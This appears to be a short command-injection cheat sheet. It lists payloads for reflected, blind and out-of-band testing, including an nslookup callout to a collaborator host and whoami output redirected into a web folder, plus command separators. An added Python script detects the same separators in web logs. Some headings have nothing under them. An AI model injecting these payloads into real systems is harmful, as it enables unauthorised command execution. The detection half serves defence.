Exploitation
Do not forget to URL-encode the payloads.
Reflected
& echo test123 &
Blind
& ping -c 10 127.0.0.1 &
Blind (ping RCE listener)
Kali:
tcpdump -i <NETWORK_CARD> icmp
Victim:
& ping <KALI_IP> &
Blind OAST
& nslookup collaborator-link.net &
Blind redirecting the input
& whoami > /var/www/static/whoami.txt &
Command separators
&
&&
|
||
More command separators
Inline Command Execution (Linux)
Check if command is executed via cmd or powershell
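The separators and the URL-encoding note above, seen from the detection side: an added example (not part of the original page) that decodes query values, including double-encoded ones, before looking for `&`, `&&`, `|` and `||`. The log layout, the `/stock` endpoint and its parameter names are assumptions made for the sample.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Separators listed on this page, longest first so "||" is not reported as "|".
SEPARATOR = re.compile(r"\|\||&&|\||&")
# Request target inside a common-log-format line (assumed log layout).
REQUEST = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo nested URL-encoding (%2526 -> %26 -> &); bounded number of rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_separators(target):
    """Return (param, separator, decoded value) for each query value holding a separator."""
    hits = []
    # parse_qsl splits on the raw "&" delimiters and decodes each value once.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = fully_decode(value)
        match = SEPARATOR.search(decoded)
        if match:
            hits.append((name, match.group(0), decoded))
    return hits

def scan(log_lines):
    """Map line number -> hits for every log line whose query carries a separator."""
    report = {}
    for number, line in enumerate(log_lines, start=1):
        request = REQUEST.search(line)
        hits = find_separators(request.group(1)) if request else []
        if hits:
            report[number] = hits
    return report

# Constructed sample lines (not from a real server); /stock and its parameters are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /stock?productId=1&storeId=2 HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /stock?productId=1&storeId=2%26%20echo%20test123%20%26 HTTP/1.1" 200 20',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /stock?productId=1&storeId=2%257C%257C%2520echo%2520test123 HTTP/1.1" 200 20',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(number, hits)
```

Values that legitimately contain `&` or `|` also match, so the hits are triage input rather than a verdict.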